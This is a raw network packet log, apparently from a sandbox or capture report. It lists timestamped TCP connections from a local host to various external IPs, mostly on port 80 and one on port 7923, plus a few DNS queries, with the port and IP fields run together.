                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.935409069 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.935781002 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.941450119 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.941495895 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.951224089 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956178904 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956268072 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956433058 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956440926 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.961285114 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.961321115 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.159024954 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.164196014 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.429742098 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.431916952 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.436897993 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.575150967 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.575306892 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.580483913 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.580542088 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.586884975 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.589346886 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.589397907 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.591564894 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.594326019 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.594341040 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596549034 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596617937 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596762896 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596853971 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.601681948 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.601696014 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.732528925 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.747543097 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752549887 CET805630013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752644062 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752856016 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752881050 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.757761955 CET805630013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.757776022 CET805630013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.783629894 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.206969023 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.208596945 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213506937 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213668108 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213752985 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213876963 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.218518972 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.218614101 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.799688101 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.799741030 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.805432081 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.289947987 CET80563083.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.290055990 CET80563083.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.887569904 CET805630713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.887747049 CET5630780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.893239021 CET805630713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.893290997 CET5630780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.904304981 CET5630980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.909255981 CET805630934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.909326077 CET5630980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.909470081 CET5630980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.909509897 CET5630980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.914365053 CET805630934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.914386988 CET805630934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.945337057 CET80563083.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.945523024 CET5630880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.950994015 CET80563083.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.951051950 CET5630880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.963326931 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.968383074 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.968439102 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.968810081 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.968905926 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.973817110 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.973829985 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.663758039 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.667093992 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.667166948 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.671982050 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.672163963 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.735502958 CET805630934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.746373892 CET5630980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.751792908 CET805630934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.751851082 CET5630980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.762414932 CET5631180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.767288923 CET80563113.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.767338991 CET5631180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.767462969 CET5631180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.767489910 CET5631180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.772253990 CET80563113.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.772735119 CET80563113.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.841479063 CET8056310165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.856662035 CET5631280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.861474037 CET805631254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.863861084 CET5631280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.863934994 CET5631280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.863934994 CET5631280192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.868763924 CET805631254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.868773937 CET805631254.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.049315929 CET5631080192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.436306000 CET80563113.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.440397978 CET5631180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.445894957 CET80563113.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.445980072 CET5631180192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.459748983 CET5631380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.465066910 CET805631318.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.465286016 CET5631380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.465286016 CET5631380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.465286016 CET5631380192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.189348936 CET5632080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.189378977 CET5632080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.194657087 CET805632047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.194689035 CET805632047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.221160889 CET5631880192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.914758921 CET805631954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.917912960 CET5631980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.923285007 CET805631954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.927063942 CET5631980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.938517094 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.943517923 CET805632118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.946118116 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.946487904 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.946487904 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.951468945 CET805632118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.951500893 CET805632118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.657990932 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.855670929 CET805632047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.855808973 CET5632080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.856945992 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.861323118 CET805632047.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.861377954 CET5632080192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.872905016 CET5632280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.877927065 CET805632234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.878019094 CET5632280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.878201962 CET5632280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.878407001 CET5632280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.883080006 CET805632234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.883299112 CET805632234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.122699022 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.174343109 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.198646069 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.203695059 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.271853924 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.315339088 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.402610064 CET805632118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.455558062 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.623955965 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.630328894 CET805632118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.630392075 CET5632180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.694814920 CET5632380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.700073004 CET805632318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.700134039 CET5632380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.700299025 CET5632380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.700318098 CET5632380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.704598904 CET805632234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.705107927 CET805632318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.705121040 CET805632318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.710340977 CET5632280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.716572046 CET805632234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.716619968 CET5632280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.912466049 CET5632480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.917279005 CET805632447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.917373896 CET5632480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.917505980 CET5632480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.917529106 CET5632480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.922354937 CET805632447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.922368050 CET805632447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.039182901 CET805633018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.039247990 CET5633080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.048187971 CET5633280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.053232908 CET805633218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.053292990 CET5633280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.053683996 CET5633280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.053702116 CET5633280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.058527946 CET805633218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.058583021 CET805633218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.195764065 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.197933912 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.202919960 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.205698013 CET5633280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.208240986 CET5633380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.213218927 CET805633318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.213359118 CET5633380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.213433981 CET5633380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.213433981 CET5633380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.218298912 CET805633318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.218308926 CET805633318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.745126009 CET805633134.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.745271921 CET5633180192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.750669003 CET805633134.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.750735998 CET5633180192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.758943081 CET5633480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.763849974 CET805633418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.763907909 CET5633480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.763998032 CET5633480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.764017105 CET5633480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.769154072 CET805633418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.769185066 CET805633418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.882185936 CET805633318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.882776022 CET5633380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.889138937 CET805633318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.889542103 CET5633380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.911741018 CET5633580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.916655064 CET805633513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.916711092 CET5633580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.919887066 CET5633580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.919907093 CET5633580192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.924859047 CET805633513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.924875975 CET805633513.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:16.645508051 CET5631880192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:16.650887966 CET805631885.214.228.140192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:16.650942087 CET5631880192.168.2.885.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.211432934 CET805633418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.211656094 CET5633480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.216797113 CET805633418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.216842890 CET5633480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.226943016 CET5633680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.232157946 CET805633613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.232208967 CET5633680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.232352018 CET5633680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.232424974 CET5633680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.237314939 CET805633613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.237325907 CET805633613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.315124035 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.320055962 CET79234972762.60.190.120192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.931081057 CET53629831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.931761026 CET6152753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.939425945 CET53615271.1.1.1192.168.2.8
